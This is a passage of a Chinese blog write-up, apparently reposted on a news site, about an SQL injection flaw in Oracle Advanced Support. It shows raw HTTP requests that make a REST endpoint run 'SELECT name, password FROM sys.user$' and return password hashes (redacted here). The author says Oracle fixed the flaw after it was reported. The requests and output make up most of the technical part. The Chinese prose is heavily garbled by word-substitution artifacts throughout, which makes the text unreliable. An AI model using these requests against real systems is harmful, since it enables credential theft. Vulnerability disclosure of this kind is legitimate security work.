看起来我们是SYSMAN 用户。经由过程这个oracal 文档(https://docs.oracle.com/cd/B16351_01/doc/server.102/b14196/users_secure001.htm) 知道,我们就是administrator.
试一下 我们可否抓掏出用户的哈希.
- HTTP Request:
- POST /rest/data/sql HTTP/1.1
- Host: host
- Connection: close
- Accept: */*
- Accept-Encoding: gzip, deflate, sdch
- Accept-Language: en-US,en;q=0.8
- Content-Length: 120
- Content-Type: application/json;charset=UTF-8
- {
- "name": "test3",
- "sql":"SELECT name, password FROM sys.user$",
- "dataSourceJNDI":"jdbc/portal"
- }
- HTTP Request:
- GET /rest/data/sql/test3 HTTP/1.1
- Host: host
- Connection: close
- Accept: application/json;charset=UTF-8
- Accept-Encoding: gzip, deflate, sdch
- Accept-Language: en-US,en;q=0.8
- Content-Type: application/json;charset=UTF-8
- Content-Length: 0
- HTTP Response:
- HTTP/1.1 200 OK
- Content-Type: application/json; charset=UTF-8
- Content-Length: 5357
- Connection: close
- [{"NAME":"SYS","PASSWORD":"[REDACTED]"},{"NAME":"PUBLIC","PASSWORD":null},{"NAME":"CONNECT","PASSWORD":null},{"NAME":"RESOURCE","PASSWORD":null},{"NAME":"DBA","PASSWORD":null},{"NAME":"SYSTEM","PASSWORD":"[REDACTED]"},{"NAME":"SELECT_CATALOG_ROLE","PASSWORD":null},{"NAME":"EXECUTE_CATALOG_ROLE","PASSWORD":null}
- …
我们可以获得数据库中的用户暗码的哈希值。我编辑和删除了重要的部分。知道了我们是一个具有administrator权限的用户,当然后续我们还可以做很多工作。然而,针对此博客的目标,我停止下来了。
结论
关于这个匿名sql履行我接洽了oracle,他们很快的答复并且修复了这个问题。对我而言真正的问题是为什么web办事压根儿就许可sql语句被履行呢?
这个博客最大年夜的收成是必定要看竽暌功用中的javascript文件。在多个web应用和外网的渗入渗出测试中,我已经发清楚明了隐蔽在javascript文件中sql 注入,敕令履行,和 xml实体注入进击。
作为针对闇练渗入渗出测试者的演习义务,看完这篇博客并且统计若干个你能肯定的马脚。提示:跨越三处。
【编辑推荐】
- 若何确认Google用户的具体电子邮件地址(已提交Google马脚嘉奖筹划)
- 微软Word马脚:黑客可应用链接主动更新安装恶意软件
- 烽火18台系列之十五: 工控资产普查与马脚安然检测
- 应对安然马脚:若何将LFI变为RFI
- 应用PowerShell代码注入马脚绕过受限说话模式
推荐阅读
跟着科技的进步,大年夜数据大年夜科学前沿逐渐深刻到各行业。2017年中国的大年夜数据行业有什么新动态?大年夜数据行颐魅整体市场范围若何?大年夜数据行业前景若何?若何助力企业成长?今日的比格数据,我们来一路解读>>>详细阅读
本文标题:Oracle Advanced Support系统SQL注入漏洞挖掘经验分享
地址:http://www.17bianji.com/lsqh/37236.html
1/2 1

网友点评
精彩导读
科技快报
品牌展示